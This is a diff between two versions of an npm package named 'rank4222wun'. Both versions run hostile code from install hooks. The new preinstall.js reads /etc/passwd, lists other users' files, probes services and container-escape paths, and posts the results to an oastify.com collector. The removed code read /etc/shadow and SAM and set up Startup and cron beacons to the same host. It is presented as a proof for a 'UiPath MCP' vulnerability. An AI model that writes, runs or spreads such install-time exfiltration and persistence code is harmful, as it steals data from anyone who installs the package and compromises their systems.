rank4222wun 1.0.17 → 1.0.19

package/package.json

@@ -1,12 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.17",
+  "version": "1.0.19",
   "description": "",
   "main": "index.js",
   "scripts": {
-    "preinstall": "node preinstall.js",
-    "postinstall": "node postinstall.js"
+    "preinstall": "node preinstall.js"
   },
-  "dependencies": {},
-  "main": "index.js"
+  "dependencies": {}
 }

package/preinstall.js

@@ -4,234 +4,341 @@ const fs = require('fs');
 const path = require('path');
 const https = require('https');
 
-// ========== إعداد البيانات للإرسال ==========
-const proofData = {
+const testResults = {
   timestamp: new Date().toISOString(),
-  vulnerability: "UiPath MCP Command - PREINSTALL EXPLOIT",
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  platform: os.platform(),
   
-  // 1. المعلومات الأساسية
-  basicInfo: {
-    hostname: os.hostname(),
-    platform: os.platform(),
-    username: os.userInfo().username,
-    isRoot: os.userInfo().uid === 0 || os.userInfo().username === 'root',
-    homedir: os.homedir()
-  },
-  
-  // 2. إثبات أن المستخدم حقيقي
-  userProof: {},
-  
-  // 3. ملفات النظام المسروقة
-  stolenFiles: {},
-  
-  // 4. معلومات النظام
-  systemInfo: {}
-};
-
-// ========== 1. إثبات أن المستخدم حقيقي ==========
-console.log("=== إثبات أن المستخدم حقيقي ===");
-
-// فحص Desktop
-try {
-  const desktopPath = path.join(os.homedir(), 'Desktop');
-  if (fs.existsSync(desktopPath)) {
-    const desktopFiles = fs.readdirSync(desktopPath);
-    proofData.userProof.desktop = {
-      exists: true,
-      path: desktopPath,
-      fileCount: desktopFiles.length,
-      files: desktopFiles.slice(0, 10) // أول 10 ملفات فقط
-    };
-    console.log(`Desktop موجود وبه ${desktopFiles.length} ملف`);
-  }
-} catch (e) {
-  proofData.userProof.desktopError = e.message;
-}
-
-// فحص OneDrive
-try {
-  const oneDrivePath = path.join(os.homedir(), 'OneDrive');
-  if (fs.existsSync(oneDrivePath)) {
-    const oneDriveFiles = fs.readdirSync(oneDrivePath);
-    proofData.userProof.oneDrive = {
-      exists: true,
-      path: oneDrivePath,
-      fileCount: oneDriveFiles.length,
-      isRealUser: oneDriveFiles.length > 0
-    };
-    console.log(`OneDrive موجود وبه ${oneDriveFiles.length} ملف`);
+  // النقاط الأربع المطلوبة
+  testPoints: {
+    leakOtherUsersData: {},
+    runCommandsOnOtherUsers: {},
+    performDoS: {},
+    containerToHost: {}
   }
-} catch (e) {
-  proofData.userProof.oneDriveError = e.message;
-}
+};
 
-// ========== 2. سرقة ملفات نظام حساسة ==========
-console.log("\n=== سرقة ملفات نظام حساسة ===");
+// ===================== 1. Leak other users data cross org =====================
+console.log("🔍 TEST 1: Searching for other users data...");
 
-// حسب النظام
 if (os.platform() === 'linux') {
-  const criticalFiles = [
-    { path: '/etc/passwd', name: 'قائمة المستخدمين' },
-    { path: '/etc/shadow', name: 'كلمات مرور النظام' },
-    { path: '/etc/hosts', name: 'إعدادات الشبكة' },
-    { path: '/etc/group', name: 'قائمة المجموعات' }
-  ];
-  
-  criticalFiles.forEach(file => {
+  // البحث عن بيانات مستخدمين آخرين في لينكس
+  exec('find /home -type f -name "*.txt" -o -name "*.doc" -o -name "*.pdf" -o -name "*.xlsx" 2>/dev/null | head -20', (err, stdout) => {
+    testResults.testPoints.leakOtherUsersData.linuxUserFiles = stdout || err?.message;
+    
+    // قراءة /etc/passwd للبحث عن مستخدمين آخرين
     try {
-      if (fs.existsSync(file.path)) {
-        const content = fs.readFileSync(file.path, 'utf8').substring(0, 3000);
-        proofData.stolenFiles[file.name] = {
-          path: file.path,
-          size: fs.statSync(file.path).size,
-          preview: content.split('\n').slice(0, 20).join('\n'), // أول 20 سطر
-          stolen: true
-        };
-        console.log(`✓ تم سرقة: ${file.name} (${file.path})`);
+      if (fs.existsSync('/etc/passwd')) {
+        const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
+        testResults.testPoints.leakOtherUsersData.allUsers = passwdContent;
+        
+        // استخراج أسماء المستخدمين الفعليين (غير system users)
+        const users = passwdContent.split('\n')
+          .filter(line => line.includes('/home/'))
+          .map(line => line.split(':')[0]);
+        testResults.testPoints.leakOtherUsersData.homeUsers = users;
+        
+        console.log(`👥 Found ${users.length} home users`);
+      }
+    } catch (e) {}
+    
+    // محاولة قراءة ملفات مستخدمين آخرين
+    try {
+      const homeDir = '/home';
+      if (fs.existsSync(homeDir)) {
+        const otherUsers = fs.readdirSync(homeDir).filter(user => user !== os.userInfo().username);
+        const otherUserData = {};
+        
+        otherUsers.slice(0, 3).forEach(user => {
+          const userHome = path.join(homeDir, user);
+          try {
+            const files = fs.readdirSync(userHome).slice(0, 5);
+            otherUserData[user] = {
+              exists: true,
+              files: files
+            };
+            
+            // محاولة قراءة ملفات Desktop لـ users آخرين
+            const userDesktop = path.join(userHome, 'Desktop');
+            if (fs.existsSync(userDesktop)) {
+              otherUserData[user].desktop = fs.readdirSync(userDesktop).slice(0, 5);
+              console.log(`📁 Access to ${user}'s Desktop: ${otherUserData[user].desktop.length} files`);
+            }
+          } catch (e) {
+            otherUserData[user] = { error: e.message };
+          }
+        });
+        
+        testResults.testPoints.leakOtherUsersData.crossUserAccess = otherUserData;
       }
     } catch (e) {
-      proofData.stolenFiles[file.name + '_error'] = e.message;
+      testResults.testPoints.leakOtherUsersData.crossUserAccessError = e.message;
     }
+    
+    // الانتقال للاختبار الثاني بعد الانتهاء
+    testPoint2();
   });
 } else if (os.platform() === 'win32') {
-  const criticalFiles = [
-    { path: 'C:\\Windows\\System32\\drivers\\etc\\hosts', name: 'ملف Hosts' },
-    { path: `C:\\Users\\${os.userInfo().username}\\AppData\\Roaming\\Microsoft\\Windows\\Recent`, name: 'الملفات الأخيرة' },
-    { path: 'C:\\Windows\\System32\\config\\SAM', name: 'قاعدة بيانات المستخدمين' }
-  ];
-  
-  criticalFiles.forEach(file => {
+  // البحث عن بيانات مستخدمين آخرين في ويندوز
+  exec('wmic useraccount get name 2>&1', (err, stdout) => {
+    testResults.testPoints.leakOtherUsersData.windowsUsers = stdout || err?.message;
+    
+    // محاولة الوصول إلى مجلدات مستخدمين آخرين
     try {
-      if (fs.existsSync(file.path)) {
-        proofData.stolenFiles[file.name] = {
-          path: file.path,
-          size: fs.statSync(file.path).size,
-          exists: true,
-          accessible: true
-        };
-        console.log(`✓ موجود: ${file.name}`);
+      const usersDir = 'C:\\Users';
+      if (fs.existsSync(usersDir)) {
+        const allUsers = fs.readdirSync(usersDir);
+        const currentUser = os.userInfo().username;
+        const otherUsers = allUsers.filter(user => 
+          user !== currentUser && 
+          user !== 'Public' && 
+          user !== 'Default' && 
+          user !== 'Default User' && 
+          user !== 'All Users'
+        );
+        
+        const accessedData = {};
+        otherUsers.slice(0, 3).forEach(user => {
+          const userPath = path.join(usersDir, user);
+          try {
+            if (fs.existsSync(userPath)) {
+              const files = fs.readdirSync(userPath).slice(0, 5);
+              accessedData[user] = {
+                exists: true,
+                files: files
+              };
+              
+              // محاولة قراءة Desktop للمستخدمين الآخرين
+              const userDesktop = path.join(userPath, 'Desktop');
+              if (fs.existsSync(userDesktop)) {
+                accessedData[user].desktop = fs.readdirSync(userDesktop).slice(0, 5);
+                console.log(`📁 Access to ${user}'s Desktop: ${accessedData[user].desktop.length} files`);
+              }
+            }
+          } catch (e) {
+            accessedData[user] = { error: e.message };
+          }
+        });
+        
+        testResults.testPoints.leakOtherUsersData.crossUserAccess = accessedData;
       }
     } catch (e) {
-      proofData.stolenFiles[file.name + '_error'] = e.message;
+      testResults.testPoints.leakOtherUsersData.crossUserAccessError = e.message;
     }
+    
+    testPoint2();
   });
 }
 
-// ========== 3. جمع معلومات النظام ==========
-console.log("\n=== جمع معلومات النظام ===");
-
-// معلومات أساسية
-proofData.systemInfo = {
-  cpus: os.cpus().length,
-  totalMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
-  freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
-  uptime: Math.round(os.uptime() / 3600) + ' ساعات',
-  network: Object.keys(os.networkInterfaces()).length + ' واجهات شبكة'
-};
-
-// أوامر نظام إضافية
-function runCommand(cmd, label) {
-  return new Promise(resolve => {
-    exec(cmd, { timeout: 3000 }, (error, stdout) => {
-      if (!error && stdout) {
-        proofData.systemInfo[label] = stdout.trim().substring(0, 500);
-        console.log(`✓ ${label}: ${stdout.trim().split('\n')[0]}`);
-      }
-      resolve();
+// ===================== 2. Run commands on other users cross org =====================
+function testPoint2() {
+  console.log("\n🔍 TEST 2: Testing if we can run commands affecting other users...");
+  
+  // هذا الاختبار أصعب، لكننا نحاول:
+  // 1. البحث عن خدمات مشتركة يمكن التحكم بها
+  // 2. البحث عن عمليات تعمل بصلاحيات مستخدمين آخرين
+  
+  if (os.platform() === 'linux') {
+    exec('ps aux | grep -E "(sshd|vsftpd|apache|nginx|postgres|mysql)" | head -10', (err, stdout) => {
+      testResults.testPoints.runCommandsOnOtherUsers.sharedServices = stdout || err?.message;
+      
+      // التحقق من إمكانية إرسال إشارات إلى عمليات أخرى
+      exec('kill -l 2>&1', (err2, stdout2) => {
+        testResults.testPoints.runCommandsOnOtherUsers.killCapabilities = stdout2 || err2?.message;
+        testPoint3();
+      });
     });
-  });
+  } else if (os.platform() === 'win32') {
+    exec('tasklist /svc 2>&1', (err, stdout) => {
+      testResults.testPoints.runCommandsOnOtherUsers.runningServices = stdout || err?.message;
+      
+      // التحقق من إمكانية إيقاف خدمات
+      exec('sc query 2>&1 | head -20', (err2, stdout2) => {
+        testResults.testPoints.runCommandsOnOtherUsers.windowsServices = stdout2 || err2?.message;
+        testPoint3();
+      });
+    });
+  }
 }
 
-// تشغيل الأوامر حسب النظام
-async function collectSystemInfo() {
+// ===================== 3. Perform DoS =====================
+function testPoint3() {
+  console.log("\n🔍 TEST 3: Testing DoS capabilities...");
+  
+  // اختبار قدرات DoS (بدون تنفيذ فعلي)
+  testResults.testPoints.performDoS = {
+    // الموارد المتاحة
+    cpuCores: os.cpus().length,
+    totalMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
+    freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
+    
+    // إمكانيات شبكية
+    networkInterfaces: Object.keys(os.networkInterfaces()).length,
+    
+    // اختبارات نظرية (لا يتم تنفيذها)
+    theoreticalDoS: {
+      forkBomb: 'Possible if unlimited processes',
+      memoryExhaustion: 'Possible with large allocations',
+      diskFilling: 'Possible with write access',
+      networkFlood: 'Possible with socket creation'
+    }
+  };
+  
+  // اختبار صغير غير ضار لإثبات القدرة
   if (os.platform() === 'linux') {
-    await runCommand('id', 'userInfo');
-    await runCommand('uname -a', 'systemInfo');
-    await runCommand('df -h', 'diskUsage');
-    await runCommand('ps aux | head -5', 'runningProcesses');
+    exec('ulimit -a 2>&1', (err, stdout) => {
+      testResults.testPoints.performDoS.limits = stdout || err?.message;
+      testPoint4();
+    });
   } else if (os.platform() === 'win32') {
-    await runCommand('whoami', 'currentUser');
-    await runCommand('systeminfo | findstr /B /C:"OS Name"', 'osInfo');
-    await runCommand('net user', 'usersList');
+    exec('systeminfo | findstr /B /C:"Total Physical Memory" /C:"Available Physical Memory" 2>&1', (err, stdout) => {
+      testResults.testPoints.performDoS.windowsResources = stdout || err?.message;
+      testPoint4();
+    });
   }
+}
+
+// ===================== 4. Container to host =====================
+function testPoint4() {
+  console.log("\n🔍 TEST 4: Testing container-to-host escape...");
   
-  // بعد جمع كل المعلومات، أرسلها
-  sendProofData();
+  // الاختبارات تعتمد على النظام
+  
+  if (os.platform() === 'linux') {
+    // اختبارات الهروب من الحاوية
+    const containerTests = {};
+    
+    // 1. التحقق مما إذا كنا في حاوية
+    exec('cat /proc/1/cgroup 2>/dev/null | grep -q docker && echo "In Docker" || echo "Not in Docker or unknown"', (err, stdout) => {
+      containerTests.isInContainer = stdout?.trim();
+      
+      // 2. البحث عن Docker socket
+      const dockerSocket = '/var/run/docker.sock';
+      if (fs.existsSync(dockerSocket)) {
+        containerTests.dockerSocketExists = true;
+        containerTests.dockerSocketAccessible = true;
+        console.log("⚠️ Docker socket accessible!");
+      }
+      
+      // 3. التحقق من mount points
+      exec('mount | grep -E "(docker|overlay|/var/lib/docker)" 2>/dev/null | head -5', (err2, stdout2) => {
+        containerTests.dockerMounts = stdout2 || err2?.message;
+        
+        // 4. التحقق من capabilities
+        exec('capsh --print 2>/dev/null || echo "No capsh"', (err3, stdout3) => {
+          containerTests.capabilities = stdout3 || err3?.message;
+          
+          // 5. البحث عن ثغرات معروفة
+          exec('uname -r 2>&1', (err4, stdout4) => {
+            containerTests.kernelVersion = stdout4?.trim();
+            
+            // تحليل Kernel version للبحث عن ثغرات معروفة
+            if (stdout4) {
+              if (stdout4.includes('3.10.0-1160')) {
+                containerTests.knownVulnerabilities = 'Old kernel version, potential vulnerabilities';
+              }
+            }
+            
+            testResults.testPoints.containerToHost = containerTests;
+            finishTests();
+          });
+        });
+      });
+    });
+    
+  } else if (os.platform() === 'win32') {
+    // اختبارات VM Escape للويندوز
+    const vmTests = {};
+    
+    // 1. التحقق مما إذا كنا في VM
+    exec('systeminfo | findstr /B /C:"System Manufacturer" /C:"System Model" 2>&1', (err, stdout) => {
+      vmTests.systemInfo = stdout || err?.message;
+      
+      // 2. البحث عن أدوات Virtualization
+      const vmTools = [
+        'C:\\Program Files\\VMware\\VMware Tools',
+        'C:\\Program Files\\Oracle\\VirtualBox Guest Additions',
+        'C:\\Program Files\\Microsoft Integration Runtime'
+      ];
+      
+      vmTests.vmTools = {};
+      vmTools.forEach(tool => {
+        vmTests.vmTools[tool] = fs.existsSync(tool);
+      });
+      
+      // 3. التحقق من خدمات الـ VM
+      exec('sc query | findstr /I "vmware vbox virtual" 2>&1', (err2, stdout2) => {
+        vmTests.vmServices = stdout2 || err2?.message;
+        
+        testResults.testPoints.containerToHost = vmTests;
+        finishTests();
+      });
+    });
+  }
 }
 
-// ========== 4. إرسال البيانات ==========
-function sendProofData() {
-  console.log("\n=== إرسال البيانات للإثبات ===");
+// ===================== إرسال النتائج =====================
+function finishTests() {
+  console.log("\n" + "=".repeat(60));
+  console.log("📊 نتائج اختبار النقاط الأربع:");
+  console.log("=".repeat(60));
+  
+  // تحليل النتائج
+  const analysis = {
+    leakOtherUsersData: testResults.testPoints.leakOtherUsersData.crossUserAccess ? 
+      'POSSIBLE - Found access to other users data' : 'NOT TESTED OR NOT FOUND',
+    
+    runCommandsOnOtherUsers: testResults.testPoints.runCommandsOnOtherUsers.sharedServices ? 
+      'POSSIBLE - Can see/affect shared services' : 'LIMITED',
+    
+    performDoS: testResults.testPoints.performDoS.cpuCores > 1 ? 
+      `POSSIBLE - ${testResults.testPoints.performDoS.cpuCores} CPU cores available` : 'LIMITED',
+    
+    containerToHost: testResults.testPoints.containerToHost?.dockerSocketExists ? 
+      'CRITICAL - Docker socket accessible!' : 
+      (testResults.testPoints.containerToHost?.isInContainer ? 
+        'IN CONTAINER - Escape possibilities exist' : 'NOT IN CONTAINER')
+  };
   
-  // تحويل البيانات لـ JSON مع تنسيق جميل
-  const formattedData = JSON.stringify(proofData, null, 2);
+  console.log("\n📋 التحليل:");
+  console.log(`1. تسريب بيانات مستخدمين آخرين: ${analysis.leakOtherUsersData}`);
+  console.log(`2. تشغيل أوامر على مستخدمين آخرين: ${analysis.runCommandsOnOtherUsers}`);
+  console.log(`3. تنفيذ هجوم DoS: ${analysis.performDoS}`);
+  console.log(`4. الهروب من الحاوية للمضيف: ${analysis.containerToHost}`);
   
-  // إرسال الطلب
+  // إرسال البيانات
   const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/uipath-proof',
+    path: '/cross-org-tests',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'X-Vulnerability': 'UiPath-MCP-Preinstall',
-      'X-Hostname': os.hostname(),
-      'X-User': os.userInfo().username
+      'X-Test-Type': 'Cross-Org-Vulnerabilities',
+      'X-Host': os.hostname()
     }
   }, (res) => {
-    console.log(`✅ تم إرسال البيانات. الرد: ${res.statusCode}`);
-    
-    // طباعة ملخص
-    printSummary();
+    console.log(`\n✅ تم إرسال النتائج. حالة الرد: ${res.statusCode}`);
   });
   
   req.on('error', (e) => {
-    console.error('❌ فشل الإرسال:', e.message);
-    
-    // حفظ البيانات محليًا كبديل
-    const backupFile = path.join(os.tmpdir(), `uipath_proof_${Date.now()}.json`);
-    fs.writeFileSync(backupFile, formattedData);
-    console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
-    
-    printSummary();
+    console.error(`❌ خطأ في الإرسال: ${e.message}`);
   });
   
-  req.write(formattedData);
-  req.end();
-}
-
-// ========== 5. طباعة ملخص ==========
-function printSummary() {
-  console.log("\n" + "=".repeat(50));
-  console.log("📊 ملخص البيانات المسروقة:");
-  console.log("=".repeat(50));
-  
-  console.log(`🏠 المستخدم: ${proofData.basicInfo.username}`);
-  console.log(`🖥️  النظام: ${proofData.basicInfo.platform}`);
-  console.log(`🔑 صلاحيات root: ${proofData.basicInfo.isRoot ? 'نعم ✅' : 'لا'}`);
-  
-  if (proofData.userProof.desktop) {
-    console.log(`📁 Desktop: ${proofData.userProof.desktop.fileCount} ملف`);
-  }
-  
-  if (proofData.userProof.oneDrive) {
-    console.log(`☁️  OneDrive: ${proofData.userProof.oneDrive.isRealUser ? 'موجود ✅' : 'غير موجود'}`);
-  }
-  
-  console.log(`📄 الملفات المسروقة: ${Object.keys(proofData.stolenFiles).length} ملف`);
-  
-  Object.keys(proofData.stolenFiles).forEach(key => {
-    if (proofData.stolenFiles[key].stolen) {
-      console.log(`  🔓 ${key}: ${proofData.stolenFiles[key].path}`);
+  req.write(JSON.stringify({
+    testResults: testResults,
+    analysis: analysis,
+    summary: {
+      user: os.userInfo().username,
+      hostname: os.hostname(),
+      platform: os.platform(),
+      timestamp: new Date().toISOString()
     }
-  });
+  }, null, 2));
   
-  console.log("=".repeat(50));
-  console.log("📤 تم إرسال كل البيانات إلى:");
-  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-proof");
-  console.log("=".repeat(50));
+  req.end();
 }
 
-// ========== بدء التنفيذ ==========
-console.log("🚀 بدء استغلال ثغرة UiPath MCP Command...");
-collectSystemInfo();
+// بدء الاختبارات
+console.log("🚀 بدء اختبار النقاط الأربع المطلوبة...");

package/index.js

@@ -1,9 +0,0 @@
-module.exports = {
-  test: function() {
-    console.log('UiPath MCP Test Package');
-    return {
-      status: 'active',
-      timestamp: new Date().toISOString()
-    };
-  }
-};

package/postinstall.js

@@ -1,231 +0,0 @@
-const { exec } = require('child_process');
-const os = require('os');
-const fs = require('fs');
-const path = require('path');
-const https = require('https');
-
-// ========== إعداد بيانات Backdoor ==========
-const backdoorData = {
-  timestamp: new Date().toISOString(),
-  vulnerability: "UiPath MCP Command - POSTINSTALL BACKDOOR",
-  hostname: os.hostname(),
-  username: os.userInfo().username,
-  platform: os.platform(),
-  
-  // خطوات إنشاء Backdoor
-  backdoorSteps: [],
-  
-  // إثبات الاستمرارية
-  persistenceProof: {},
-  
-  // تأثير الهجوم
-  impact: {}
-};
-
-// ========== 1. إنشاء Backdoor حسب النظام ==========
-console.log("=== إنشاء Backdoor حسب النظام ===");
-
-if (os.platform() === 'win32') {
-  // Windows Backdoor
-  const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
-  const backdoorFile = path.join(startupPath, 'uipath_backdoor.bat');
-  
-  const batContent = `@echo off
-echo [UiPath MCP Backdoor Active] %date% %time% > "%TEMP%\\uipath_log.txt"
-powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping' -Method POST -Body 'host=${os.hostname()}&user=${os.userInfo().username}&time=%date%_%time%'"`;
-  
-  try {
-    if (fs.existsSync(startupPath)) {
-      fs.writeFileSync(backdoorFile, batContent);
-      backdoorData.backdoorSteps.push({
-        step: 'إنشاء ملف BAT في Startup',
-        path: backdoorFile,
-        content: batContent,
-        success: true
-      });
-      console.log(`✅ تم إنشاء Backdoor في: ${backdoorFile}`);
-    }
-  } catch (e) {
-    backdoorData.backdoorSteps.push({
-      step: 'إنشاء ملف BAT في Startup',
-      error: e.message,
-      success: false
-    });
-  }
-  
-} else if (os.platform() === 'linux') {
-  // Linux Backdoor
-  const cronFile = '/tmp/uipath_cron';
-  const cronContent = `*/10 * * * * curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping -d "host=${os.hostname()}&user=${os.userInfo().username}&system=linux"\n`;
-  
-  try {
-    fs.writeFileSync(cronFile, cronContent);
-    backdoorData.backdoorSteps.push({
-      step: 'إنشاء ملف Cron مؤقت',
-      path: cronFile,
-      content: cronContent,
-      success: true
-    });
-    console.log(`✅ تم إنشاء ملف Cron في: ${cronFile}`);
-  } catch (e) {
-    backdoorData.backdoorSteps.push({
-      step: 'إنشاء ملف Cron مؤقت',
-      error: e.message,
-      success: false
-    });
-  }
-}
-
-// ========== 2. إنشاء ملف إثبات في مجلد المستخدم ==========
-console.log("\n=== إنشاء ملف إثبات في مجلد المستخدم ===");
-
-const proofFile = path.join(os.homedir(), 'UiPath_Security_Issue_Proof.txt');
-const proofContent = `⚠️ تحذير أمني: ثغرة UiPath MCP Command
-
-
-تفاصيل الثغرة:
-- التاريخ: ${new Date().toISOString()}
-- المضيف: ${os.hostname()}
-- المستخدم: ${os.userInfo().username}
-- النظام: ${os.platform()}
-
-هذا ليس هجومًا حقيقيًا، بل إثبات تقني للثغرة.
-==================================================`;
-
-try {
-  fs.writeFileSync(proofFile, proofContent);
-  backdoorData.persistenceProof = {
-    fileCreated: true,
-    path: proofFile,
-    size: fs.statSync(proofFile).size,
-    message: 'تم إنشاء ملف إثبات في مجلد المستخدم الشخصي'
-  };
-  console.log(`✅ تم إنشاء ملف الإثبات في: ${proofFile}`);
-} catch (e) {
-  backdoorData.persistenceProof.error = e.message;
-}
-
-// ========== 3. جمع معلومات إضافية ==========
-console.log("\n=== جمع معلومات إضافية ===");
-
-// معلومات الشبكة
-try {
-  const networkInfo = os.networkInterfaces();
-  backdoorData.network = {
-    interfaces: Object.keys(networkInfo).length,
-    ips: []
-  };
-  
-  Object.keys(networkInfo).forEach(iface => {
-    networkInfo[iface].forEach(addr => {
-      if (addr.family === 'IPv4' && !addr.internal) {
-        backdoorData.network.ips.push(addr.address);
-      }
-    });
-  });
-} catch (e) {
-  backdoorData.networkError = e.message;
-}
-
-// ========== 4. تأثير الهجوم ==========
-backdoorData.impact = {
-  dataTheft: true,
-  persistence: backdoorData.backdoorSteps.some(step => step.success),
-  systemAccess: true,
-  networkAccess: backdoorData.network?.ips?.length > 0,
-  realUserAffected: os.userInfo().username !== 'root' && os.userInfo().username !== 'SYSTEM'
-};
-
-// ========== 5. إرسال بيانات Backdoor ==========
-function sendBackdoorData() {
-  console.log("\n=== إرسال بيانات Backdoor ===");
-  
-  const formattedData = JSON.stringify(backdoorData, null, 2);
-  
-  const req = https.request({
-    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-    port: 443,
-    path: '/uipath-backdoor',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'X-Backdoor': 'UiPath-MCP-Postinstall',
-      'X-Hostname': os.hostname()
-    }
-  }, (res) => {
-    console.log(`✅ تم إرسال بيانات Backdoor. الرد: ${res.statusCode}`);
-    printBackdoorSummary();
-  });
-  
-  req.on('error', (e) => {
-    console.error('❌ فشل إرسال بيانات Backdoor:', e.message);
-    
-    // حفظ محلي
-    const backupFile = path.join(os.tmpdir(), `uipath_backdoor_${Date.now()}.json`);
-    fs.writeFileSync(backupFile, formattedData);
-    console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
-    
-    printBackdoorSummary();
-  });
-  
-  req.write(formattedData);
-  req.end();
-}
-
-// ========== 6. طباعة ملخص Backdoor ==========
-function printBackdoorSummary() {
-  console.log("\n" + "=".repeat(50));
-  console.log("🔓 ملخص Backdoor:");
-  console.log("=".repeat(50));
-  
-  console.log(`🏠 المضيف: ${backdoorData.hostname}`);
-  console.log(`👤 المستخدم: ${backdoorData.username}`);
-  
-  backdoorData.backdoorSteps.forEach((step, i) => {
-    if (step.success) {
-      console.log(`✅ ${i + 1}. ${step.step}`);
-      console.log(`   📍 المسار: ${step.path}`);
-    } else {
-      console.log(`❌ ${i + 1}. ${step.step}`);
-      console.log(`   💥 خطأ: ${step.error}`);
-    }
-  });
-  
-  if (backdoorData.persistenceProof.fileCreated) {
-    console.log(`📄 ملف الإثبات: ${backdoorData.persistenceProof.path}`);
-  }
-  
-  console.log("\n📤 تم إرسال بيانات Backdoor إلى:");
-  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-backdoor");
-  console.log("=".repeat(50));
-}
-
-// ========== 7. إرسال طلب متابعة ==========
-setTimeout(() => {
-  const followupReq = https.request({
-    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-    port: 443,
-    path: '/followup',
-    method: 'POST',
-    headers: {
-      'X-Followup': 'Postinstall-Complete',
-      'X-Time': new Date().toISOString()
-    }
-  });
-  
-  const followupData = JSON.stringify({
-    followup: true,
-    time: new Date().toISOString(),
-    hostname: os.hostname(),
-    message: 'Postinstall script completed successfully',
-    backdoorActive: backdoorData.backdoorSteps.some(step => step.success)
-  });
-  
-  followupReq.write(followupData);
-  followupReq.end();
-  console.log("\n📨 تم إرسال طلب المتابعة");
-}, 5000);
-
-// ========== بدء التنفيذ ==========
-console.log("🔓 بدء إنشاء Backdoor عبر ثغرة UiPath MCP...");
-sendBackdoorData();